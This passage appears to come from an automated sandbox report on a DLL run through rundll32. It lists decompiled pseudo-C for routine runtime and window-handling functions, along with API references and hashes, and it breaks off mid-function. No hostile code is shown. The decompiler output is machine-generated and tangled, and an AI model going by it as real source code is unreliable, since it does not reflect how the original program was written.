                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10004FB4
                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
                                                                        • HeapFree.KERNEL32(00000000), ref: 1000502F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@Heap$FreeProcess
                                                                        • String ID:
                                                                        • API String ID: 834397476-0
                                                                        • Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                        • Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
                                                                        • Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                        • Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 69%
                                                                        			E1000E9AF(intOrPtr __ecx, intOrPtr* __edi) {
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				intOrPtr* _t87;
                                                                        				intOrPtr* _t88;
                                                                        				intOrPtr _t89;
                                                                        				intOrPtr* _t90;
                                                                        				void* _t91;
                                                                        				intOrPtr _t104;
                                                                        				intOrPtr* _t121;
                                                                        				intOrPtr* _t122;
                                                                        				intOrPtr* _t124;
                                                                        				intOrPtr* _t126;
                                                                        				intOrPtr* _t128;
                                                                        				intOrPtr* _t130;
                                                                        				intOrPtr* _t148;
                                                                        				intOrPtr* _t161;
                                                                        				intOrPtr _t162;
                                                                        				intOrPtr _t163;
                                                                        				void* _t165;
                                                                        				intOrPtr _t167;
                                                                        				intOrPtr* _t168;
                                                                        				void* _t170;
                                                                        				intOrPtr _t183;
                                                                        
                                                                        				_t161 = __edi;
                                                                        				E10011BF0(0x1003af91, _t170);
                                                                        				_t167 = __ecx;
                                                                        				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
                                                                        				 *((intOrPtr*)(__ecx)) = 0x1004060c;
                                                                        				 *(_t170 - 4) = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                                        					_t121 =  *((intOrPtr*)(__ecx + 0x50));
                                                                        					if(_t121 != 0) {
                                                                        						_t122 =  *_t121;
                                                                        						_push(_t170 - 0x14);
                                                                        						_push(0x10043208);
                                                                        						_push(_t122);
                                                                        						if( *((intOrPtr*)( *_t122))() >= 0) {
                                                                        							_t124 =  *((intOrPtr*)(_t170 - 0x14));
                                                                        							_push(_t170 - 0x10);
                                                                        							_push(0x10043348);
                                                                        							 *((intOrPtr*)(_t170 - 0x10)) = 0;
                                                                        							_push(_t124);
                                                                        							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
                                                                        								_t128 =  *((intOrPtr*)(_t170 - 0x10));
                                                                        								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
                                                                        								_t130 =  *((intOrPtr*)(_t170 - 0x10));
                                                                        								 *((intOrPtr*)( *_t130 + 8))(_t130);
                                                                        							}
                                                                        							_t126 =  *((intOrPtr*)(_t170 - 0x14));
                                                                        							 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_push(_t161);
                                                                        				L8:
                                                                        				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
                                                                        					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
                                                                        					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
                                                                        					goto L8;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
                                                                        				E1001E047(_t167 + 0x18);
                                                                        				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
                                                                        					L16:
                                                                        					_t87 =  *((intOrPtr*)(_t167 + 8));
                                                                        					if(_t87 != 0) {
                                                                        						 *((intOrPtr*)( *_t87 + 8))(_t87);
                                                                        					}
                                                                        					_t88 =  *((intOrPtr*)(_t167 + 0xc));
                                                                        					if(_t88 != 0) {
                                                                        						 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
                                                                        						L29:
                                                                        						_t89 =  *((intOrPtr*)(_t167 + 0x34));
                                                                        						if(_t89 != 0) {
                                                                        							__imp__CoTaskMemFree(_t89);
                                                                        						}
                                                                        						_t138 =  *((intOrPtr*)(_t167 + 0x54));
                                                                        						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
                                                                        							E1000DA8C(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
                                                                        							E10009EC5( *((intOrPtr*)(_t167 + 0x54)));
                                                                        						}
                                                                        						_t162 =  *((intOrPtr*)(_t167 + 0x54));
                                                                        						_t195 = _t162;
                                                                        						if(_t162 != 0) {
                                                                        							E10009EC5(_t162);
                                                                        							_push(_t162);
                                                                        							L1001F7A9(0, _t162, _t167, _t195);
                                                                        						}
                                                                        						_t163 =  *((intOrPtr*)(_t167 + 0x50));
                                                                        						_t196 = _t163;
                                                                        						if(_t163 != 0) {
                                                                        							E1000E731(_t163, _t196);
                                                                        							_push(_t163);
                                                                        							L1001F7A9(0, _t163, _t167, _t196);
                                                                        						}
                                                                        						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
                                                                        						if(_t90 != 0) {
                                                                        							 *((intOrPtr*)( *_t90 + 8))(_t90);
                                                                        						}
                                                                        						_t168 =  *((intOrPtr*)(_t167 + 0x48));
                                                                        						if(_t168 != 0) {
                                                                        							 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                                        						}
                                                                        						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
                                                                        						_t91 = E1001E10D( *((intOrPtr*)(_t170 - 0x18)));
                                                                        						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
                                                                        						return _t91;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t170 - 0x10)) = 0;
                                                                        						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
                                                                        							L28:
                                                                        							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
                                                                        							goto L29;
                                                                        						}
                                                                        						_t165 = 0;
                                                                        						do {
                                                                        							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
                                                                        							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
                                                                        							if(_t104 == 0) {
                                                                        								goto L25;
                                                                        							} else {
                                                                        								goto L24;
                                                                        							}
                                                                        							do {
                                                                        								L24:
                                                                        								 *((intOrPtr*)( *((intOrPtr*)(E10006D96(_t170 - 0x14))) + 0x94)) = 0;
                                                                        							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
                                                                        							L25:
                                                                        							E1001E047( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
                                                                        							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
                                                                        							if(_t148 != 0) {
                                                                        								 *((intOrPtr*)( *_t148 + 4))(1);
                                                                        							}
                                                                        							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
                                                                        							_t165 = _t165 + 0x28;
                                                                        						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
                                                                        						goto L28;
                                                                        					}
                                                                        				}
                                                                        				_t161 = 0;
                                                                        				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
                                                                        					L14:
                                                                        					if(_t183 != 0) {
                                                                        						_push( *((intOrPtr*)(_t167 + 0x3c)));
                                                                        						L1001F7A9(0, _t161, _t167, _t183);
                                                                        						_push( *((intOrPtr*)(_t167 + 0x40)));
                                                                        						L1001F7A9(0, _t161, _t167, _t183);
                                                                        					}
                                                                        					goto L16;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t170 - 0x10)) = 0;
                                                                        				do {
                                                                        					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
                                                                        					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
                                                                        					_t161 = _t161 + 1;
                                                                        				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
                                                                        				_t183 =  *((intOrPtr*)(_t167 + 0x38));
                                                                        				goto L14;
                                                                        			}


                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FreeTask$ClearH_prologVariant
                                                                        • String ID:
                                                                        • API String ID: 82050969-0
                                                                        • Opcode ID: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                        • Instruction ID: 43d2ea8d123215d3b84d8545f0b19a771d1917bb58f1b2237b0c9da6e0f617ce
                                                                        • Opcode Fuzzy Hash: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                        • Instruction Fuzzy Hash: 3E712675A00682DFDB24CFA4C9C486AB7F5FF49380715486DE156AB665CB30FC81CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1001B36C(signed int _a4, signed int _a8, long _a12) {
                                                                        				void _v5;
                                                                        				signed int _v12;
                                                                        				long _v16;
                                                                        				signed int _t79;
                                                                        				void* _t82;
                                                                        				signed int _t86;
                                                                        				signed int* _t89;
                                                                        				long _t90;
                                                                        				void* _t92;
                                                                        				intOrPtr _t93;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				char _t100;
                                                                        				signed int _t101;
                                                                        				long _t103;
                                                                        				long _t106;
                                                                        				signed int _t107;
                                                                        				signed int _t113;
                                                                        				signed int _t114;
                                                                        				signed char _t117;
                                                                        				intOrPtr _t118;
                                                                        				long _t120;
                                                                        				void* _t124;
                                                                        				intOrPtr* _t125;
                                                                        				signed int _t127;
                                                                        				signed char* _t128;
                                                                        				void* _t129;
                                                                        				void* _t130;
                                                                        
                                                                        				_v12 = _v12 & 0x00000000;
                                                                        				_t113 = _a8;
                                                                        				_t124 = _t113;
                                                                        				if(_a12 == 0) {
                                                                        					L42:
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				}
                                                                        				_t79 = _a4;
                                                                        				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
                                                                        				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
                                                                        				_t82 =  *_t125 + _t127;
                                                                        				_t117 =  *((intOrPtr*)(_t82 + 4));
                                                                        				if((_t117 & 0x00000002) != 0) {
                                                                        					goto L42;
                                                                        				}
                                                                        				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
                                                                        					_a12 = _a12 - 1;
                                                                        					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
                                                                        					_t124 = _t113 + 1;
                                                                        					_v12 = 1;
                                                                        					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
                                                                        				}
                                                                        				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
                                                                        					_t86 = _v16;
                                                                        					_t118 =  *_t125;
                                                                        					_v12 = _v12 + _t86;
                                                                        					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
                                                                        					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
                                                                        						L41:
                                                                        						return _v12;
                                                                        					}
                                                                        					__eflags = _t86;
                                                                        					if(_t86 == 0) {
                                                                        						L15:
                                                                        						_t89 =  *_t125 + _t127 + 4;
                                                                        						 *_t89 =  *_t89 & 0x000000fb;
                                                                        						__eflags =  *_t89;
                                                                        						L16:
                                                                        						_t90 = _a8;
                                                                        						_t120 = _v12 + _t90;
                                                                        						__eflags = _t90 - _t120;
                                                                        						_a12 = _t90;
                                                                        						_v12 = _t120;
                                                                        						if(_t90 >= _t120) {
                                                                        							L40:
                                                                        							_t114 = _t113 - _a8;
                                                                        							__eflags = _t114;
                                                                        							_v12 = _t114;
                                                                        							goto L41;
                                                                        						} else {
                                                                        							goto L17;
                                                                        						}
                                                                        						while(1) {
                                                                        							L17:
                                                                        							_t92 =  *_a12;
                                                                        							__eflags = _t92 - 0x1a;
                                                                        							if(_t92 == 0x1a) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags = _t92 - 0xd;
                                                                        							if(_t92 == 0xd) {
                                                                        								__eflags = _a12 - _t120 - 1;
                                                                        								if(_a12 >= _t120 - 1) {
                                                                        									_a12 = _a12 + 1;
                                                                        									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
                                                                        									__eflags = _t97;
                                                                        									if(_t97 != 0) {
                                                                        										L26:
                                                                        										__eflags = _v16;
                                                                        										if(_v16 == 0) {
                                                                        											L34:
                                                                        											 *_t113 = 0xd;
                                                                        											L35:
                                                                        											_t113 = _t113 + 1;
                                                                        											__eflags = _t113;
                                                                        											L36:
                                                                        											_t120 = _v12;
                                                                        											__eflags = _a12 - _t120;
                                                                        											if(_a12 < _t120) {
                                                                        												continue;
                                                                        											}
                                                                        											goto L40;
                                                                        										}
                                                                        										_t98 =  *_t125;
                                                                        										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
                                                                        										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
                                                                        											__eflags = _t113 - _a8;
                                                                        											if(__eflags != 0) {
                                                                        												L33:
                                                                        												E1001968C(__eflags, _a4, 0xffffffff, 1);
                                                                        												_t130 = _t130 + 0xc;
                                                                        												__eflags = _v5 - 0xa;
                                                                        												if(_v5 == 0xa) {
                                                                        													goto L36;
                                                                        												}
                                                                        												goto L34;
                                                                        											}
                                                                        											__eflags = _v5 - 0xa;
                                                                        											if(__eflags != 0) {
                                                                        												goto L33;
                                                                        											}
                                                                        											L32:
                                                                        											 *_t113 = 0xa;
                                                                        											goto L35;
                                                                        										}
                                                                        										_t100 = _v5;
                                                                        										__eflags = _t100 - 0xa;
                                                                        										if(_t100 == 0xa) {
                                                                        											goto L32;
                                                                        										}
                                                                        										 *_t113 = 0xd;
                                                                        										 *((char*)( *_t125 + _t127 + 5)) = _t100;
                                                                        										goto L35;
                                                                        									}
                                                                        									_t101 = GetLastError();
                                                                        									__eflags = _t101;
                                                                        									if(_t101 != 0) {
                                                                        										goto L34;
                                                                        									}
                                                                        									goto L26;
                                                                        								}
                                                                        								_t103 = _a12 + 1;
                                                                        								__eflags =  *_t103 - 0xa;
                                                                        								if( *_t103 != 0xa) {
                                                                        									_a12 = _t103;
                                                                        									goto L34;
                                                                        								}
                                                                        								_a12 = _a12 + 2;
                                                                        								goto L32;
                                                                        							}
                                                                        							 *_t113 = _t92;
                                                                        							_t113 = _t113 + 1;
                                                                        							_a12 = _a12 + 1;
                                                                        							goto L36;
                                                                        						}
                                                                        						_t93 =  *_t125;
                                                                        						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
                                                                        						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
                                                                        							_t128 = _t93 + _t127 + 4;
                                                                        							 *_t128 =  *_t128 | 0x00000002;
                                                                        							__eflags =  *_t128;
                                                                        						}
                                                                        						goto L40;
                                                                        					}
                                                                        					__eflags =  *_t113 - 0xa;
                                                                        					if( *_t113 != 0xa) {
                                                                        						goto L15;
                                                                        					}
                                                                        					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
                                                                        					goto L16;
                                                                        				} else {
                                                                        					_t106 = GetLastError();
                                                                        					_t129 = 5;
                                                                        					if(_t106 != _t129) {
                                                                        						__eflags = _t106 - 0x6d;
                                                                        						if(_t106 == 0x6d) {
                                                                        							goto L42;
                                                                        						}
                                                                        						_t107 = E10013707(_t106);
                                                                        						L10:
                                                                        						return _t107 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(E100136F5())) = 9;
                                                                        					_t107 = E100136FE();
                                                                        					 *_t107 = _t129;
                                                                        					goto L10;
                                                                        				}
                                                                        			}

                                                                        0x1001b49a
                                                                        0x1001b480
                                                                        0x1001b482
                                                                        0x1001b483
                                                                        0x00000000
                                                                        0x1001b483
                                                                        0x1001b525
                                                                        0x1001b527
                                                                        0x1001b52c
                                                                        0x1001b52e
                                                                        0x1001b532
                                                                        0x1001b532
                                                                        0x1001b532
                                                                        0x00000000
                                                                        0x1001b52c
                                                                        0x1001b440
                                                                        0x1001b443
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b44b
                                                                        0x00000000
                                                                        0x1001b3f0
                                                                        0x1001b3f0
                                                                        0x1001b3f8
                                                                        0x1001b3fb
                                                                        0x1001b411
                                                                        0x1001b414
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b41b
                                                                        0x1001b421
                                                                        0x00000000
                                                                        0x1001b421
                                                                        0x1001b402
                                                                        0x1001b408
                                                                        0x1001b40d
                                                                        0x00000000
                                                                        0x1001b40d

                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
                                                                        • GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
                                                                        • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
                                                                        • GetLastError.KERNEL32(?,?,?), ref: 1001B4C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFileLastRead
                                                                        • String ID:
                                                                        • API String ID: 1948546556-0
                                                                        • Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                        • Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
                                                                        • Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                        • Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E1000E58F(void* __ecx, void* __edx) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				void* _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct tagRECT _v56;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t58;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr* _t62;
                                                                        				intOrPtr* _t65;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr* _t67;
                                                                        				intOrPtr* _t69;
                                                                        				intOrPtr* _t71;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t107;
                                                                        				void* _t126;
                                                                        				intOrPtr _t130;
                                                                        				intOrPtr* _t131;
                                                                        				intOrPtr* _t133;
                                                                        				intOrPtr* _t134;
                                                                        				void* _t135;
                                                                        				intOrPtr _t136;
                                                                        				void* _t137;
                                                                        
                                                                        				_t126 = __edx;
                                                                        				_t135 = __ecx;
                                                                        				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
                                                                        				_v12 = _t130;
                                                                        				_t58 = IsWindowVisible( *(_t130 + 0x1c));
                                                                        				asm("sbb eax, eax");
                                                                        				_t60 =  ~_t58 + 1;
                                                                        				_v24 = _t60;
                                                                        				_t107 = 0;
                                                                        				if(_t60 != 0) {
                                                                        					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
                                                                        					GetWindowRect( *(_t130 + 0x1c),  &_v40);
                                                                        					asm("cdq");
                                                                        					asm("cdq");
                                                                        					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
                                                                        					E100203AD(_t130, 1);
                                                                        				}
                                                                        				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
                                                                        				_t131 = _t135 + 0x48;
                                                                        				_push(_t131);
                                                                        				_push(0x100405f8);
                                                                        				_push(_t62);
                                                                        				if( *((intOrPtr*)( *_t62))() < 0) {
                                                                        					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
                                                                        					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
                                                                        					if(_t66 >= _t107) {
                                                                        						_t67 = _v16;
                                                                        						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
                                                                        						_t69 = _v16;
                                                                        						 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                                        						_t71 = _v20;
                                                                        						if(_t71 != _t107) {
                                                                        							_t133 = _t135 + 8;
                                                                        							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
                                                                        							_t73 = _v20;
                                                                        							 *((intOrPtr*)( *_t73 + 8))(_t73);
                                                                        							_t66 = _v8;
                                                                        							if(_t66 >= _t107) {
                                                                        								_t134 =  *_t133;
                                                                        								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
                                                                        								goto L14;
                                                                        							}
                                                                        						} else {
                                                                        							_t66 = 0x80004005;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t84 =  *_t131;
                                                                        					_t134 = _t135 + 0x4c;
                                                                        					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
                                                                        					if( *_t134 == _t107) {
                                                                        						_v8 = 0x80004003;
                                                                        					}
                                                                        					if(_v8 >= _t107) {
                                                                        						L14:
                                                                        						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
                                                                        						if(_v24 != _t107) {
                                                                        							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
                                                                        							E100203AD(_v12, _t107);
                                                                        						}
                                                                        						_t66 = _t136;
                                                                        					} else {
                                                                        						if(_v24 != _t107) {
                                                                        							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
                                                                        							E100203AD(_v12, _t107);
                                                                        						}
                                                                        						_t66 = _v8;
                                                                        					}
                                                                        				}
                                                                        				return _t66;
                                                                        			}

                                                                        APIs
                                                                        • IsWindowVisible.USER32 ref: 1000E5AD
                                                                        • GetDesktopWindow.USER32 ref: 1000E5C0
                                                                        • GetWindowRect.USER32 ref: 1000E5D3
                                                                        • GetWindowRect.USER32 ref: 1000E5E0
                                                                          • Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A
                                                                          • Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$DesktopMoveShowVisible
                                                                        • String ID:
                                                                        • API String ID: 3835705305-0
                                                                        • Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                        • Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
                                                                        • Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                        • Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t68;
                                                                        				void** _t73;
                                                                        				signed int _t74;
                                                                        				long _t76;
                                                                        				intOrPtr _t79;
                                                                        				signed int _t81;
                                                                        				char* _t86;
                                                                        				int _t91;
                                                                        				long _t93;
                                                                        				intOrPtr* _t100;
                                                                        				void* _t102;
                                                                        				signed int _t107;
                                                                        				char _t110;
                                                                        				struct _OVERLAPPED* _t112;
                                                                        				long _t115;
                                                                        				signed int _t118;
                                                                        				struct _OVERLAPPED* _t120;
                                                                        				void* _t121;
                                                                        				void* _t123;
                                                                        
                                                                        				_t121 = _t123 - 0x3a0;
                                                                        				_t68 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t112 = 0;
                                                                        				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
                                                                        				 *(_t121 - 0x78) = 0;
                                                                        				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
                                                                        				if( *(_t121 + 0x3b0) != 0) {
                                                                        					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
                                                                        					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
                                                                        					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
                                                                        					if(__eflags != 0) {
                                                                        						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
                                                                        					}
                                                                        					_t73 =  *_t100 + _t118;
                                                                        					__eflags = _t73[1] & 0x00000080;
                                                                        					if((_t73[1] & 0x00000080) == 0) {
                                                                        						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
                                                                        						__eflags = _t74;
                                                                        						if(_t74 == 0) {
                                                                        							 *(_t121 - 0x6c) = GetLastError();
                                                                        						} else {
                                                                        							 *(_t121 - 0x6c) = _t112;
                                                                        							 *(_t121 - 0x78) =  *(_t121 - 0x80);
                                                                        						}
                                                                        					} else {
                                                                        						__eflags =  *(_t121 + 0x3b0) - _t112;
                                                                        						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
                                                                        						 *(_t121 - 0x6c) = _t112;
                                                                        						if( *(_t121 + 0x3b0) <= _t112) {
                                                                        							L25:
                                                                        							_t79 =  *_t100;
                                                                        							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
                                                                        							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
                                                                        								L28:
                                                                        								 *((intOrPtr*)(E100136F5())) = 0x1c;
                                                                        								_t81 = E100136FE();
                                                                        								 *_t81 = _t112;
                                                                        								L29:
                                                                        								_t77 = _t81 | 0xffffffff;
                                                                        								L31:
                                                                        								goto L32;
                                                                        							}
